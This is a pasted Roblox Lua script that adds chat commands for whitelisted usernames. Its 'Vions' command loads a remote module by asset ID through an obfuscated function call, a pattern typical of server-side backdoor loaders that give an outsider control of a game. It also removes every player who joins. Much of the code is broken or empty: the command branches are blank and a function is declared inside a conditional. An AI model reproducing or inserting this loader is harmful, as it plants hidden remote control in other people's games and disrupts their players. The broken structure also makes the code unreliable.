Advertisement
Guest User

Untitled

a guest
Sep 19th, 2019
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. local whitelist = {"XxAla123xX", "other", "other"}
  2. local prefix = "/e !"
  3. game.Players.PlayerAdded:connect(function(player)
  4. player.Chatted:connect(function(msg)
  5. for i =1,#whitelist do
  6. if player.Name == whitelist[i] then
  7. if msg == prefix.."KickAll" then --Command
  8.  
  9. elseif msg == "/e !KillAll" then --Command
  10.  
  11. elseif msg == "/e !ShutDown" then --Command
  12.  
  13.  
  14.  
  15. function onPlayerEntered(newPlayer)
  16. wait(0.001)
  17. newPlayer:Remove()
  18. end
  19. elseif msg == prefix.."MML" or msg == "/e !mml" then --Command
  20.  
  21. elseif msg == prefix.."Vions" or msg == "/e !Vions" then --Command
  22. require(3931777240).load458459a4k95f(player.Name)
  23. end
  24. end
  25. end
  26. end)
  27. end)
  28. game.Players.PlayerAdded:connect(onPlayerEntered)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement